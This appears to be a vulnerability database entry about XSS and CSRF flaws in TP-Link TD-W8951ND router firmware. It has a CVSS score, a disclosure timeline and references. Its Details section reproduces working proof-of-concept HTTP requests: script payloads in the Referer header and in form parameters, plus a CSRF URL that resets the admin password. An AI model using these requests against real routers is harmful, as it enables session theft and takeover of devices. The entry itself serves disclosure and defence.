Sign-up

ID

VAR-201308-0460


TITLE

TP-LINK TD-W8951ND Router has multiple input validation vulnerabilities

Trust: 0.6

sources: CNVD: CNVD-2013-12811

DESCRIPTION

The TP-LINK TD-W8951ND Router is a wireless router device. TP-LINK TD-W8951ND Router Firmware 4.0.0 Build 120607 Release 30923 has multiple cross-site scripting and cross-site request forgery vulnerabilities. Allows an attacker to exploit a vulnerability to obtain sensitive information or hijack a user's session: 1. Incorrect handling of the Referer field without a URL, allowing unauthenticated attackers to exploit the vulnerability for a reflective cross-site scripting vulnerability. 2. The \"home_wlan_1\" parameter is incorrectly handled, allowing authenticated attackers to exploit vulnerabilities for reflective cross-site scripting vulnerabilities. 3. There are multiple cross-site request forgery attacks, allowing the attacker to construct a malicious URI, enticing the login user to resolve, and performing malicious operations in the target user context, such as resetting the administrator password. Attackers can use these vulnerabilities to execute arbitrary script code in the context of the affected site. They can steal cookie-based authentication, perform unauthorized operations, leak or modify sensitive information, and there may be other forms of attacks. There are vulnerabilities in TP-Link TD-W8951ND 4.0.0 Build 120607.Rel. 30923, other versions may also be affected. Other attacks may also be possible. ----------- Author: ----------- xistence < xistence[at]0x90[.]nl > ------------------------- Affected products: ------------------------- Tested on TP-Link TD-W8951ND Firmware 4.0.0 Build 120607 Rel.30923 ------------------------- Affected vendors: ------------------------- TP-Link http://www.tp-link.com/ ---------- Details: ---------- [ 0x01 - Unauthenticated Reflected XSS in Referer for non-existing url pages ] GET /doesnotexist HTTP/1.1 Host: <IP> Referer: http://pwned"><script>alert("XSS")</script> Connection: keep-alive [ 0x02 - Authenticated Reflected XSS in "home_wlan_1" arguments ] http:// <IP>/Forms/home_wlan_1?wlanWEBFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http:// <IP>/Forms/home_wlan_1?AccessFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http:// <IP>/Forms/home_wlan_1?wlan_APenable=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E [ 0x03 - Authenticated XSS in diagnostics (ping) "/Forms/tools_test_1" argument "PingIPAddr" ] POST /Forms/tools_test_1 HTTP/1.1 Host: <IP> Referer: http://<IP>/maintenance/tools_test.htm Authorization: Basic blablabla== Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 164 Test_PVC=PVC0&PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingflag=1&trace_open_flag=0&InfoDisplay=Ping+request+could+not+find+host+ [ 0x04 - Reset Admin password CSRF ] http:// <IP>/Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfirm=PWNED -------------- Timeline: -------------- 2013-05-30 Provided details to TP-Link. 2013-06-01 Response from TP-Link that they will try to fix it. 2013-07-31 No further response, mailed again to ask for status. 2013-08-30 No response, public disclosure

Trust: 1.44

sources: CNVD: CNVD-2013-12811 // CNNVD: CNNVD-201308-547 // BID: 62103 // PACKETSTORM: 123016

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2013-12811

AFFECTED PRODUCTS

vendor:tp linkmodel:td-w8951nd routerscope: - version: -

Trust: 0.6

vendor:tp linkmodel:td-w8951nd build 120607.rscope:eqversion:4.0.0

Trust: 0.3

sources: CNVD: CNVD-2013-12811 // BID: 62103

CVSS

SEVERITY

CVSSV2

CVSSV3

CNVD: CNVD-2013-12811
value: MEDIUM

Trust: 0.6

CNVD: CNVD-2013-12811
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

sources: CNVD: CNVD-2013-12811

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201308-547

TYPE

input validation

Trust: 0.6

sources: CNNVD: CNNVD-201308-547

EXTERNAL IDS

db:BIDid:62103

Trust: 1.5

db:PACKETSTORMid:123016

Trust: 0.7

db:CNVDid:CNVD-2013-12811

Trust: 0.6

db:CNNVDid:CNNVD-201308-547

Trust: 0.6

sources: CNVD: CNVD-2013-12811 // BID: 62103 // PACKETSTORM: 123016 // CNNVD: CNNVD-201308-547

REFERENCES

url:http://packetstormsecurity.com/files/123016/tplinktdw8951nd-xssxsrf.txt

Trust: 0.6

url:http://www.securityfocus.com/bid/62103

Trust: 0.6

url:http://www.tp-link.us/support/download/?pcid=203&model=td-w8951nd

Trust: 0.3

url:http://pwned"><script>alert("xss")</script>

Trust: 0.1

url:http://www.tp-link.com/

Trust: 0.1

url:http://<ip>/maintenance/tools_test.htm

Trust: 0.1

sources: CNVD: CNVD-2013-12811 // BID: 62103 // PACKETSTORM: 123016 // CNNVD: CNNVD-201308-547

CREDITS

xistence

Trust: 1.0

sources: BID: 62103 // PACKETSTORM: 123016 // CNNVD: CNNVD-201308-547

SOURCES

db:CNVDid:CNVD-2013-12811
db:BIDid:62103
db:PACKETSTORMid:123016
db:CNNVDid:CNNVD-201308-547

LAST UPDATE DATE

2022-05-17T01:43:24.463000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2013-12811date:2013-09-05T00:00:00
db:BIDid:62103date:2013-08-30T00:00:00
db:CNNVDid:CNNVD-201308-547date:2013-09-04T00:00:00

SOURCES RELEASE DATE

db:CNVDid:CNVD-2013-12811date:2013-09-05T00:00:00
db:BIDid:62103date:2013-08-30T00:00:00
db:PACKETSTORMid:123016date:2013-08-30T18:22:22
db:CNNVDid:CNNVD-201308-547date:2013-08-30T00:00:00